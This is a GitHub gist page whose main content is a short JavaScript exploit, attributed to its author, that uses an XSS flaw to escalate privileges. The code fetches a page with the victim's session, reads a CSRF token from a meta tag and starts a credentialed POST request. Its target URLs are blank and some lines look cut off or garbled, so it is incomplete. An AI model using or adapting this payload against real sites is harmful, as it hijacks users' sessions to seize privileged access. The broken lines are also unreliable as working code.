Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
// XSS Exploit code for Privilege Escalation
// Author: Shawar Khan
var woot = document.createElement('html');
fetch('',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){
var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
function privilege_escalate(){
var req = new XMLHttpRequest();'POST','',true);
req.withCredentials = true;
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.